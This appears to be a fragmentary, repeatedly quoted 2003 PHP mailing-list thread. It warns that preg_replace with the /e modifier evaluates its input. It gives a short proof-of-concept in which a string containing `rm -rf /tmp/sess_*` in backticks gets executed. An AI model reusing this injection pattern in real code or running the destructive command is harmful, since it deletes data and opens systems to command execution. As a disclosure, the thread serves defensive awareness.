On Mon, 3 Feb 2003, Maxim Maletsky wrote:
> "James E. Flemer" <[EMAIL PROTECTED]> wrote... :
>
> > I found a more evil example:
> >
> > > $a = "___! `rm -rf /tmp/sess_*` !___";
> > $b = preg_replace("/!(.*)!/e", "print(\\1);", $a);
> > ?>
> >
> > This happily executes "rm -rf /tmp/sess_*". I
"James E. Flemer" <[EMAIL PROTECTED]> wrote... :
> I found a more evil example:
>
>$a = "___! `rm -rf /tmp/sess_*` !___";
> $b = preg_replace("/!(.*)!/e", "print(\\1);", $a);
> ?>
>
> This happily executes "rm -rf /tmp/sess_*". I will not
> give out more examples, but if one examines the
I found a more evil example:
This happily executes "rm -rf /tmp/sess_*". I will not
give out more examples, but if one examines the code for
addslashes() it is quite obvious what you can an cannot do
here. Thus it is clearly a Bad Thing for someone to use
preg_replace with the /e modifier and
